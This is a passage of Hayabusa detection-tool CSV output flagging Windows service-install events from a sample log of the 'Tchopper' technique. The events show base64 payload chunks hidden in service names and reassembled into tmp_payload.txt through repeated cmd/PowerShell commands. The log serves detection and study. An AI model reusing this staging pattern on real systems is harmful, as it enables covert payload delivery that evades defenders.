execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append 